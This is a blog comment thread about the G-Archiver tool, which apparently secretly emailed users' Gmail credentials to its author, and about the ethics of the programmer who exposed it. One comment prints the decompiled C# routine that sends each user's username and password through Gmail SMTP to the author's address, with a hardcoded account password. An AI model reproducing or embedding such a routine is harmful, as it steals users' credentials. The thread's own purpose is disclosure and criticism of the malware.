I had a guy email me his Credit Report once in Electronic Form. He frantically emailed me and asked me to delete it, which I did. I called him and he was so happy that he sent me an Amazon.com giftcard for $25. I have had people email me their e-tickets for their flights, etc.

That´s really bad, and the problem is that only people like us (who knows what reflector is) realize of that kind of things and very often the law is short to punish this kinds of crimes.

Good Job Jeff! if you stop programming try to be a detective or a tv series writer.

I really enjoy your blog, thanks!

Goes to show how much you can trust websites which request your email user/pass to import contacts!

You're an honest man, Jeff. Nice work.

Trust is good, possibility to check is better. If anything, this story is the best warning against closed source software.

BTW, why is this software still linked to?

Funny, alot of people seems to be praising Jeff's honesty. Althought I'm sure Jeff is honest, the hero of the story is John Terry, as Jeff himself clearly points out. Not sure where this misunderstanding is coming from

Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source.

Actually John Terry is the antagonist in this story and Dustin Brooks, the protagonist, deserves all the praise.

"Trust but verify."

KyleG, I agree, I love Jeff's blog but sometimes I wish he would link better to the original source. If in this case it was sent to him privately in an email, he should at least point that out.

Surely the *real* hero is Dustin Brooks? John Terry is the villain of the tale.

Good will, but poor action:

"John Terry" had probably setup an email forwarding to a backup gmail account in case somebody decompile his code.

So he still has all the passwords.

So now, with everything deleted and the account password modified, how are we going to notify all these account that they should change their password ?

That's why I don't download programs from those shareware directories.

Check out the site of the g-archiver "author": http://www.matemediainc.com

Looks like a spammy SEO site. Not surprised. There's probably a lot of shareware out there like this, because most of the time the guys pulling scams like this are script kiddies who are trading "recipes" on private forums.

It's great to see somebody talking about ethics in relation to programming. So often I think it's easy to get caught up in an idea of "I'm just interacting with a machine, and it interacts with other machines, and I'm not responsible for anything...".

It's also unfortunate that there really are people out there who would violate those ethics, but it's good to see that they are real--that's something that does have to be confronted.

I think point 1 in that ACM code is also something to think about. I wonder how many people are working on software that really does not contribute to human well-being, and don't think about it. It's an unfortunate tradition, though--some of the first computers ever were used to aim missiles, and without some twisty logic it's hard to say how that contributes to human well-being more than other things the same programmer could have spent their time doing.

-Max

"Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source."

I'm pretty sure this IS the original source. There are no other references to Dustin Brooks / John Terry / G-Archiver that I can find on the web.

Jeff's usually really awesome about linking to sources.

You stopped FAR too short. This should be turned over to authorities. That must be some sort of CRIMINAL offense.

Wow. How incredible. I think this is a wake-up call... we shouldn't automatically trust software.

You logged into my gmail account? And deleted the fruits of my hard work? Some people have no shame!

(sorry, couldn't resist. -- My name is Thomas, not J Terry)

mwalts: Dustin Brooks is the hero, not John Terry. John Terry is the inept coder.

This John Terry seems to email pawel lesnikowski and adityasonphavde (aditya rao) I would not trust these people either.

This sort of problem is what OAuth is designed to help solve.

Not only can 3rd party websites not truely be trusted with one's passwords, now that all computers are pretty much online all the time, it's not safe to trust closed source apps, or even open source apps with uninspected code, with one's password.

First of all, Dustin Brooks for president. What a hero.

Next, note that matemedia.com (alleged publisher of this tool) has at least two telephone numbers:
1-877-309-7521
1-877-752-1309
(first via http://www.russmate.com/client_support.php, second via whois)

Dustin Brooks' sense of humor seems to be at least equal to his sense of justice. I want Mr. Brooks to call "John Terry" and explain the situation. In fact, if he recorded the call and placed the MP3 on a lame shareware site I would probably even pay $29.95 to listen.

That's fishy. Why would jterry need to include his u/p in the program? As a diabolical villain, I don't think he'd make the cut to be on 24. I mean, this isn't like an IRC bot where you have to put the hostname to phone home to into the bot... He could have sent email to his account without exposing the password!

Is he really that dense, or is this some kind of weird hoax?

One thing is true -- if you DL the program and use reflector, you do indeed see the facts as they are described in this post:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}

Very interesting Jeff. Btw, here in British Columbia, Canada, Software Engineers can be registered as Professional Engineers that adhere to this code of ethics:
http://www.apeg.bc.ca/resource/publications/actbylawscode.html

Interestingly enough, as a professional software engineer, you can be held legally responsible for the designs and codes you write. I wonder what our profession (vocation? craft?) would look like if we were all held legally responsible for our work?

Patrick wrote :
>That's fishy. Why would jterry need to include his u/p in the program?

Because GMail requires authentication to use their SMTP server.

Why would anyone pay $30 to get a backup copy of their GMail account when Thunderbird is free? Just connect to GMail's IMAP server, set TB to save all downloaded messages, and do a complete sync. Not only would you then have a complete backup, but you would also be able to read and send email from TB while having it synced with GMail.

Just about any other mail client with IMAP support should also work.

> Jeff's usually really awesome about linking to sources.

Thank you, I do try very very hard to link all the sources I talk about. The original is from an email; I added some text to the post to clarify this and put Dustin's name in bold.

And yes, Dustin is the hero here, not me. I'm just reporting it.

Look everyone, I don't mean to be bursting everyones bubble but I'm not finding this in the source code anywhere. While this is my first time using reflector, I'm not an idiot and I have searched through all the source code Reflector produces and there is no reference to an email address "jterry79@gmail.com"

Now maybe the software has been updated and the malicious code has been removed, or maybe someone is crying wolf. I would love for someone to reference something specific other than "hey look what I found."

Ryan wrote :
>I'm not finding this in the source code anywhere

The CheckConnection method is in the SM.dll Mail class. It is not in the EXE.

Patrick copy / pasted the code accurately.

My apologies everyone. Looks like I am an idiot.

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

This was truly malicious behavior, but (as Jeff has pointed out in previous posts) users do not understand how accessible their identity can be:

I recently recovered a PC from a municipal recycling center. While evaluating its value for parts I discovered it was completely functional. The HDD still had the OS, Outlook, and several years of Turbo Tax on it. Everything was live. I didn't have the nerve to call the guy and tell him how stupid he was, but I was kind enough to bomb the machine to bedrock before reconditioning it. My son now happly surfs PBS on it. Not a bad exchange for a $20 electronics recycling charge and a dead TV.

There are times when I really pity the great unwashed user contingent, and at the same time am grateful that most geeks are non-belligerent.

Wow! That's all I can say. I wonder how many gmail accounts he's harvested. Like someone said, maybe this should be reported to the police. Since google accounts can be linked to financial information (via google checkout), this could be considered theft.

Jeff,

Great detective work.

I don't know if you've ever covered this, but I would think that just asking a user for username and password and email address on a website would probably net someone a certain percentage of people who would for simplicity sake just use the same username and password everywhere (thereby giving you their username and password to email, or who knows what).

In response to Travis, some engineers reportedly quit the company that makes the space shuttle's robotic arm, because of a proposed takeover by a U.S. arms maker.

>What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

That's always been the big problem. It's not unique to computer science at all. One could say it started with the physicists "knowing sin" but in reality you can trace it back a lot farther.

But in reality the people taking a paycheck always find a way to justify it to themselves. Oh, they're not the ones harming others -- that's what the military does, what politicians do. Oh, they're not the ones not contributing to society -- they just make the tools. Same old story.

My oh my, that is horrible! It goes to show how much seemingly legitimate software we install that could be malicious, and how much we trust we place in the authors.

This time round you had the source code, what about apps that we don't?

Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.

You don't have to try to justify it. Like it or not, there is evil in the world and people have a moral obligation to protect themselves and their families.

Some of us take that seriously, while others live behind that protection and point fingers about how bad it is.

Oh, and before I worked for a DoD contractor I worked on medical software that was responsible for helping to bring new lives into this world that might not make it.

With either job, I know I am making a difference in the world and sleeping just fine at night. I doubt if I would feel the same working on a new search engine or game or accounting package.

Didn't Dustin email all the affected users to warn them to change their passwords?

I have a problem with 4 in conjunction with 5. Often I find a lot that is unfair in our current copyright law and fairness. (Example: the RIAA has changed its tune and claim it is illegal to rip a CD you purchased for your computer or MP3 player.)

In order to behave in a fair way, I should be allowed to break copyright. But then, I'd be breaking copyright.

I'm no fan of professional soccer, but a quick search or two on some of the (non-victim) names from the screenshot appear to be related to it (John Terry of Chelsea, Pawel, and Lesnikowski). Maybe the dickwad responsible for this douchebaggery (thanks Jeff for expanding my vocabulary) is a fan.

> Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.

Is this why you chose the word "orange" for the post security word? Interesting choice. :)

Nice post Jeff.

Rule: wherever you give your passwords you should/must be cautious.

The ACM also has a similar document called Software Engineering Code of Ethics and Professional Practice which has more practical and tangible aspirations. These aren't just rules for ACM members, they prescribe a code of conduct for all software engineers.

http://www.acm.org/about/se-code#full

of these, John Terry has violated these:

3.12. Work to develop software and related documents that respect the privacy of those who will be affected by that software.

3.13. Be careful to use only accurate data derived by ethical and lawful means, and use it only in ways properly authorized.

And that, my friends, truly is coding horror.

Hi Jeff,

I don't normally post but I thought I should make an exception for this topic.

I completely agree that this is a horrible betrayal of trust. I find this offensive to the honest programmers out there for whom this has negative effects. It's scumbags like this guy that make people question every file, live in fear of scams, and contribute to fear of technology.

I really enjoy your blog, thanks for sharing this.

To give John Terry the benefit of the doubt, there is always the possibility that this was some kind of development (debugging) version that had somehow become publicly available.

http://www.matemediasoft.com/

These guys are also selling programs for MySpace and YouTube (FriendTools and TubeAdder) that require your login/password.

And here's the kicker: they're both spamming tools.

"Add thousands of new friends to your network quickly. Great tool for those who want to market to myspace users."
"This easy to use software also automates the process of adding comments on YouTube. If you plan on marketing on YouTube, you need this tool."

That russmate.com/matemedia.com site rang a bell - I knew I'd seen it somewhere before. Recently. Amid many LOLs.

And yes indeed - MateMedia turned out to be the company hosting a scammy "Federal suppliers directory" site which gave Alex Papadimoulis of The Daily WTF a chance to run a most excellent story all his own:
http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
(Do NOT miss the spectacular flameout by company staff in the comments!)

Man, 2008's really shaping up to be their year, isn't it?

Why have you linked to the original application? I think it can only have bad consequences, like improving their google rank, or lead people who aren't really paying attention over to their site where they may download it.

This is really a big threat for opensource or freeware developers. Users wont trust developers anymore whom are working hard to provide something useful.

Why didn't Mr. Brooks just use an old-fashioned Perl script for archiving?

terrible!
And Ryan the info is still there it is in Mail class in SM.dll file not in main exe.

I don't normally post, but I wanted to comment on those who are saying that programming in some way for the military violates 1 and 2 of the code above. As Oogie Pringle said, there are people in the world who are malicious, and it is important to defend against them.

Maybe this could be seen as an unfortunate prisoner's dilemma, but in no way does it reflect poorly on the ethical or moral sense of the people doing the programming.

Please elaborate more on reflector please.

Author/website perhaps? Thanks.

Phil

@Phil:

Lutz Roeder's .NET Reflector: http://www.aisto.com/roeder/dotnet/

Excellent tool.

We use Lutz as a verb. "Let's lutz it and find out"

On a related note... let's say I need to send emails through a gmail account from my C# program. This basically means there will be strings inside my source that contain the gmail username and password.

This is obviously bad, in the presence of Reflector. In the unmanaged world we could encrypt the strings using some encryption algorithm, and since the details of the encryption algorithm would be compiled to assembly nobody could tell what's going on. But in the managed world, the details of such an encrypting process are there for everyone to decompile, so it doesn't sound like that's going to work.

This _must_ be a solved problem, but I don't really know the keywords to use to find the solution...

Domenic,
you would like to use an encrypted appSettings element in your app.config then.
http://msdn2.microsoft.com/en-us/library/ms998280.aspx

Domenic, security by obscurity has never been a solution. You don't embed sensitive credentials in code. Period.

Encrypting the data means you have a key somewhere. Writing your own cryptographic algorithm means it's broken (see Schneier) and anyway, all that's needed to break your clever encrypted-password-in-executable scheme is to set up a software http/https proxy (fiddler, wireshark, etc.) and read the plain text credentials passed by the program.

Never rely on native code obfuscation for security.

HAH! I was *not* expecting my name to pop up when I started reading this post :-) BTW, Jeff sent me some awesome Coding Horror stickers for my trouble.

Patrick-I can't take credit for Jeff's choice of CAPTCHA-it was around a long time before I ever spoke to him.

Good thing you changed the password to the account.So is John Terry walking scott-free ? I believe he has some explaining to do .

Even after all this, John Terry still has less information about his victims than your average Google employee.

Why do people act so shocked? If you download any app or go to any website which asks for you credentials to do *anything* you should be extremely cautious and only trust once you've verified that it is legit. You might argue that there was no way to verify it in this case without reflecting it and looking at what it was doing, but your credentials are basically your children when you're roaming the 'net - so if you can't verify it, DON'T USE IT. It's pretty simple. And for the person who said this guy was probably smart enough to create a back-up account "in case someone reflected his code"... no, he would have obfuscated the code if he was being cautious. He f'ed up.

I assume most of you would trust, say, Facebook to keep its word and *not* store your credentials when you allow it to use its "Friend Finder"? Why?

And it's frankly a waste of time to say this is a matter of ethics and we all need to be held to a higher standard and "if only he adhered to the code" etc. Sorry, the 'net is the real world, it's not contained within our individual computers. People are out to scam, and you need to go out there believing it. As honest programmers we need to stick together, and the scammers will make themselves known. That's the real value of Jeff's post.

Actually, Raúl, U.S. law is very specific as to this particular issue. Have a look at the Federal Wiretap Act, 18 U.S.C. 2510 (http://www.cybercrime.gov/wiretap2510_2522.htm)

So, just to be a little contrarian can anyone point out in the code of ethics where it says that programmers should become vigillantes? It would seem to me that Dustin Brooks falls short of living up to the ideal of honoring property rights. By deleting the GMail account and the emails there-in Dustin has potentially opened himself up to potential prosecution under laws designed to be used against hackers. In addition he has potentially destroyed evidence that might be used to prosecute John Terry.

If he really wanted to be a good guy he could have just reported the individual to Google's security hotline along with the appropriate documentation, as well as reporting to the shareware site where the application was hosted.

You did download it directly from the developer's site? Or purchase it?

There is the possibility that you downloaded a hacked version. Although it seems unlikely the gmail account would be similar to the developer's name... a less lame scammer would send to a mail server that wouldn't provide access using same password or be traceable back to him.

If you purchased it and/or didn't accept a use at your own risk license it's hard to imagine a crime or civil liability doesn't exist.

@Joe:

If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway.

One point about trusting "free" software: there's a big difference between this sort of program and open source projects, where you (and everyone) can see the actual source code. This couldn't have happened if someone knowledgeable had been able to even glance at the source.

I was going to respond telling John Terry how he could have avoided this situation, but I decided to apply the Code of Ethics and not do so. Hopefully I made the world a better place today.

@Oogie Pringle
That’s the problem with this world, people like you. You are all about self preservation and the preservation of those close to you. The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice be-fore working on weapons and devices that we know will kill others. Just because you justify it by saying that there are evil people in the world, does not absolve you from fact that you are a contributing factor to that persons death. More innocent people die today as a result of the direct work that we do. This is no longer the days of open war when enemies met in a field and attacked each other and you knew that pretty much anybody who was there had decided to give their life for that cause. Now we have more innocent people dying than combatants. So you have to ask yourself when you write that code for the guidance chip that goes in the missile, but for the fact that I and my colleagues chose to write this code would xxxxx be dead? I know you sleep well at night because you think you are protecting your family and that is the truly tragic part about this. I know some will make the argument that anything can be a weapon, you don't know how it is going to be used, well can you honestly say that?

I wouldn't worry too much about notifying the people about their username/password compromise. As you can clearly see, the emails have never been read. Only Google could read them without marking them as read, and that's kind of irrelevant, now isn't it?

Stewie and the rest of you anti-defense morons need to take your liberal, kumbaya attitudes and shove them up your a$$e$. In a perfect world we could all rest easy knowing that no one would ever create weapons because they would all abide by some unwritten code of ethics. But the world is not perfect and someone somewhere is going to do the coding. And because of that, we need someone to do the coding on defense systems as well. That's why it's called "defense" and not "offense".

War sucks. And yes, innocent people get hurt. But innocent people get hurt by more than just war. If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

Thereby destroying the evidence, and stopping any chance you had of successfully...

a) suing for damages, or

b) proving that the criminal acts done in your name with your gmail account weren't actually perpetrated by you.

Much better would have been to change the password on the account (locking the real John Terry out), then report it to Google.

But hindsight is always 20-20, especially when you can be a vigilante hero.

@Joshua
There is a "mark as unread" button in GMail.

Isn't it really about ethics, period, and not just "programming ethics"?

However, it seems a little silly to focus on this incident -- every time we post, the internet remembers; every time we log on, we allow (without the legal action others have mentioned) large corporations to write information to our hard drives without permission, and to "phone home", without our permission.

@paulz:
"""
Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.
"""

Yes, there is such a thing as free software - free (as in free speech) open source software. The problem is not free (as in free beer) vs commercial, but closed source vs open source. And yes, there are actually programmers that give their work away without trying to steal anything from you.

MateMedia is a legitimate company and we are absolutely horrified that this has occurred.

We have removed from our websites all links to the software, and will be requesting any download sites that are hosting the software to remove it immediately.

We are in the process of notifying our customers, and we're investigating this matter with our software development team.

I think the issue here is not ethics, we're talking about unlawful behavior, that guy should be prosecuted.

Regards

What everyone seems to be missing is the fact that through g-mail you can easily set up a filter to forward all in-coming e-mail to another e-mail address without marking it read. So deleting all of the e-mails probably did absolutely nothing. Plus the fact that this guy could be using his <i>own program</i> to archive all of the e-mails he got with the usernames/passwords.

I think that Dustin Brook's heart was in the right place, but the best thing would have been to immediately change the password, and then go into "contacts" and click "select all" and send a warning e-mail to everyone (gmail automatically adds a contact for anyone that e-mails you). Then to notify Google, leaving the e-mails intact as evidence (since you already changed the password, the guy can no longer get into the account, so the e-mails don't need to be deleted).

Despite that, I think that Dustin did a great thing, and I'm glad he also made an effort to get the word out by sending the story to a well known blog like this one.

I made the mistake of telling Facebook's Friend Finder my password, and then realized how dumb it was and changed it to a pass-phrase that I will never share with anyone/anything except the gmail sign in page. I think Jeff has done a great job in championing proper password practices.

As a programmer, I'm ashamed to say that I never really thought about how I was storing my user's passwords until after reading a few posts on this blog. However my boss unfortunately will not allow me to encrypt user's passwords because he says that "we don't store any private data, and we want password recovery to be instant and easy". So we use pathetic secret questions/answers to "verify" them and then reveal to them their password in plain text right there on the webpage if they forgot it. It makes me sick. Unfortunately, I don't have a choice...

I am interested to hear any further details on what happens with this story if Google ever tells Dustin if anything ever came of this...

This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks having;
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?

BTW: To Delete the GMail Account:
Open GMail Account
Click on Settings [upper right]
Click on Google Account Settings [near bottom]
Click on My Services - Edit
Click on Close account and delete all services and info associated with it
[didn't go any further than this]

Even though Dusting Brooks got the Email account deleted thus destroying vital information I think Jeff still Has the Screenshots ,Isn't that enough to prosecute John Terry ?

well done!somebody knows who is this John Terry and his location?

I have never understood how website features like "friend finder" got so successful that every social site has one version or another. Just the thought of a 3rd party site asking me for my username and password makes me cringe. But you'll be amazed at how even developers who are supposed to savvy at things like this use these "friend finder" features.

Registrant:
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: GARCHIVER.COM
Created on: 03-Apr-07
Expires on: 03-Apr-08

Well done, Dustin!

Registrant:
MateMedia, Inc.

POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MATEMEDIASOFT.COM
Created on: 08-Aug-03
Expires on: 08-Aug-08
Last Updated on: 07-Aug-07

Administrative Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Technical Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM

Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited

This is precisely why I won't use "free" software that isn't open source or released by a "reputable" company.

One name I did notice in the gmail screen cap in the contacts list is Pawel Lesnikowski. He's a writer of .NET components:

http://www.lesnikowski.com/

Maybe he might know this John Terry. This abuse of personal trust and privacy is appalling. I hope this site and application is flagged as a trojan and taken down by everyone in the shareware community.

Dave -- if you think Dustin's ethics are the same as this other guy's, then you obviously don't really understand ethics all that well. There's nothing unethical about viewing source code of others (ripping it off is something else entirely), there's nothing unethical about stopping someone from harvesting identity information of others. Whatever ethical infractions which might exist in using someone else's login information is well covered by the doctrine of double-effect.

I used a software, which has a demo-mode for an online service. Probably in demo-mode, developer of software was using his credentials, probably hardcoded in software.

I realized, after using the software in demo-mode, if I opened the website (gmail, yea it was google's api that software uses) in browser, I logged into his gmail automatically, I thought it was some issues with Google. But later realized, it's because I used that software in demo mode, new cookies were in places.

Anyway, I informed the developer, never heard back. I don't use that software anymore for two reasons:-

1) Don't want my Gmail cookies replaced by others
2) I don't feel good, if I unintentionally log into his account

-abdul

Makes sense.

@Domenic - please stop programming, right now.

Dave asked, "Were his [Dustin Brooks] actions /really/ any more "ethical" than John Terry's?"

To which the answer is a resounding "yes."

@stewie

Go on and live in your little world where everything would be just fine if there were no guns or missiles. I'm sure that before that everyone live in peace and harmony, right? Of course, all you have to do is look at North America BEFORE 1492 and that goes right out the door.

And don't worry. People like me will continue to defend people like you so you can live in your safe little world.

Oogie

Cool ... it's OK to *steal* a log-in and password from source code, illegally log in to the email account and destroy all the messages [and the account had the perp figured out how] -because- you guys didn't like what the vendor was doing.

You haven't the foggiest fricking idea what he was /actually/ doing with any of that information - but your assumption that he was up to no good gives you the warm and fuzzy you need do what ever the hell you want. Bah ... I call BS!

Please don't confuse /any/ of this with any misguided perception that I condone what was originally happened - I'm appalled -but- that doesn't give you the right ...

> the doctrine of double-effect
Horse hockey!

Both events [provided the first one is /actually/ illegal] should be punishable by law.

Have a pleasant day,

ethical - conforming to accepted standards of social or professional behavior.

Neither act was ethical.

That's why i don't trust shareware. They can leave you with a bunch of spyware and steel your personal information. The only software that I can trust is free (as in freedom) software.

Curious thought. The email address may have been embedded in the code and done what you say, but the snapshot of the inbox shows that ALL of those passwords and email addresses were NEW and UNREAD.

Although it was a completely dumbass way of going about things, i would probably deduce that the email account was set up to capture those for the lost passwords and account names for those who use the program or something equally idiotic. In no way am i saying this is the right thing to do, but the programmer was more than likely extremely foolish, but mostly oblivious to the trust he was violating.

On the other hand, the gentleman you say had alerted google of this, violates someone else's inbox, using someone else's information that required a bit of digging to get, trashes this other party's email account, and sends a note marking it for deletion.

This is ALSO a vast breech of proper ethics.
the first thing to dowould be alert the programmer of this error, and request that it isdealt with in an ethical manner that alerts his users of this "programming error" and then re-releases with a better password storage option, if any at all.

If this fails to geyt any attention, then report it to the proper authorities or agency for dealing with this issue, as well as google.

Your friend may be in some hot water for his actions as well.

Another reason to NO revelate your password in software

Holy Living Funk! What a huge scam, I'm going to every shareware download site that will let me post a review of this and link to this article, great job! Really love your blog, everyday reader for a few months now.

Orange? I'm typing in orange, and you wrote about John Orange. Heh.

EVERYONE SHOULD USE OPENID TO AVOID THIS CRAP :)

IN GENERAL

if A does something illegal
and person B does something illegal to uncover it

B's evidence should be admissible in court
and both A and B should be tried for the crimes they committed.

In our current society, though, police may uncover crucial evidence without a warrant but it will be inadmissible in court. I think it is much more fair for the evidence to still be admissible in court AND for the officer to be tried for the crime of breaking and entering. If they want to risk a few years in jail to put a violent criminal behind bars, they should have the ability to do so.

Greg

[quote=dave]This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks having;
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?
[/quote]

There is certainly an opportunity for academic debate on the ethics exhibited by Misters Brooks and Terry, but I know where I stand within that debate. Your view struck me right away, upon reading this article, but truthfully (non-violent) vigilante justice is consistent with my personal ethics, so I don't see a conflict here. Especially when it comes down to this kind of rarely prosecuted, yet extremely harmful crime. Mr. Brooks, we are to presume, would never log into someone's account maliciously. He was simply protecting himself, and others. Mr. Terry had no right to that information to begin with, I see no foul play in preventing him from accessing it, and forcing him to contact google... or sign up for another account, of course. I believe Mr. Brooks to be a hero without doubt.

Thank you Dustin Brooks for erasing the credentials. I was not on the list but you definitely made the world a better place. Also thanks for exposing the phisher and trojan malware author.

To those that he did not do the right thing: There is NO excuse harvesting passwords. Even if "John Terry" is merely a total moron it's inexcusable, and I'm not buying it, stealing users passwords is done for ill gain.

I'd probably wouldn't do exactly as Brooks, such as I'd log in through Tor, get shocked like him, changed the password, made sure there was no forwarding, notified all users by sending them a warning together with their respective account passwords to make sure they understand it's real, then not delete anything but get the attention of the police. But I'm in no place to complain as I wouldn't have refractored it in the first place. Again, he certainly did the best he could think of, it seems he probably did neuter it, and he made the details about the trojan public. Very good job.

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

actually, dustin did miss one step. Mass emailing everyone involved to let them know what happened.

It's trivial for someone with your gmail user/password to set up a backdoor using email forwarding so that they'll get copies of any email with "password" in it or billing information.

Hell, all they have to do is change your "secondary password recovery email address" as well and they'll be able to hijack your account whenever they want to. I had this happen to me when the domain name for my password recovery email address got sold: http://internetducttape.com/2007/10/31/password-recovery-online-security/

What if this article had been about Brooks getting caught in the email account where all he found was personal mail? There's little if anything to indicate that it was any more than a crap shoot (with pretty big odds in his favor admittedly) that he would.

Although he did state: 'I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box.'
Wonder how he noticed that about 'other' users.

In addition the comment: 'It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code.' - doesn't cause any alarms here, amazing. How would having a peek improve the functionality of the program?

Have your big hug-fest because a data farmer was snagged. What he did to get there, IMHO, was wrong. I won't bother arguing the issue any further, we seem to differ on opinion in this regard ... which is ok by me. It's all just the perspective I saw/read it from at any rate.

> What if this article had been about Brooks getting caught
> in the email account where all he found was personal mail?"

In this case perhaps he'd send the account an email suggesting "Terry" should change is password. And again, he would have helped someone.

> In addition the comment: 'It didn't really have the functionality
> I was looking for, but being a programmer myself I used Reflector
> to take a peek at the source code.' - doesn't cause any alarms
> here, amazing. How would having a peek improve the functionality
> of the program?

That's one of the ways malware is identified. It's really hard to turn it around against him, especially when we know what he did.

*uses my handy-dandy CSI black-stripe decryptor to get the passwords from your image*

Shouldn't you be putting a "nofollow" on the G-Archiver link?

Travis,
What if you like killing people? You're choices are limited in that case: join the military (if you can) and get paid to do what you enjoy, work for a weapons development company and get paid more, or commit a "crime". It's all about perspective and if you're working freelance or as an employee :).

Dave wrote "You haven't the foggiest fricking idea what he was /actually/ doing with any of that information"

It doesn't matter what he was doing with it. Just collecting it without informing users that he was collecting it is either a breach of privacy laws and/or fraud.

Of course, if you don't think so, I have this new remote login application I'd like you to try. It doesn't email the IP, username, and password/SSH certificate used to me or anything!

Shameless proselytising...

This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash.

There is an ethical imperative here that overrides any economic rebuttal.

@Aaron - I would think linking to the original application i exactly the right thing to do, as CH is likely to show up as the first hit in Google for the software (as of right now it's number 4.)

@Joshua & others, the screenshot only shows that the most recent 1777 emails were unread - who knows how many thousands of people have tried the software. Plus, if they are being automatically forwarded they won't show up as read. I'm not sure that what Dustin did was right, but if he had to do it, he could have at least checked out the filters and saved the contact list first.

Interestingly the download and buy links on his site seem to be inactive. Also, I hope this doesn't hurt the reputation of <a href="http://garchiver.sourceforge.net/>garchiver</a>, the GNOME archiving utility with the almost identical name.

A.L. Flanagan wrote:
"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway."

Yes, but did Dustin do what's in *Dustin's* best interests? People have been prosecuted for simply reporting security issues in corporate websites, where the intent was benign, not malicious. It's gotten to the point that the best policy is to keep your mouth shut.

As Joe pointed out, Dustin has committed the following potential crimes (I am not a lawyer or police officer):
1) Accessing someone else's mail account, without permission
2) Deleting someone else's data, without permission
3) Destroying evidence

Of course, most will not argue Dustin did the wrong thing *morally*. But who knows, a judge might see it differently.

Here's a story where a university student could've been expelled for accessing unsecured data on a campus network:
http://chronicle.com/news/article/3146/university-allows-student-journalist-who-discovered-data-security-flaw-to-remain

It's gotten to the point that I am hesitate to run anything I dont write myself or download from a trusted source such as Microsoft or other major vendor.

The days of using stuff from TuCows are CNet have been over for quite sometime for me - and then I read something like this and it confirms what were my worst fears.

Damn.

The "intellectual 'property'" clauses 5 and 6 are why I flatly refuse to join the ACM. I have no difficulty giving credit for authorship - that is to say, I agree with attribution rights and think plagiarism is fraud.

However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies.

5 and 6 are irreconcilable with the others.

1. copyrights and patents actively destroy human well-being.
2. Enforcement of copyrights and patents harm others.
3. Those who enforce copyrights and patents rather than waiving them
are untrustworthy.
4. copyrights and patents discriminate against those who believe in free markets.
5. copyrights and patents are not proper property rights. In fact, they destroy physical property rights (even though you own something, you are not permitted to shape its physical form to convey certain information).

6. I have no difficulty giving credit to authors for authorship. The "proper credit" for "intellectual 'property'" is a massive "SCREW YOU" to whoever came up with the term.

7. Enforcement of patent and copyright in the technological limit (which the relevant infonazis are pursuing with digital restrictions management) requires gross violation of everyone' privacy to make sure people aren't (gasp) copying or using bits of information.

8. It's impossible to truly honour confidentiality while "respecting" copyrights and patents.

Can we now even trust the browsers?

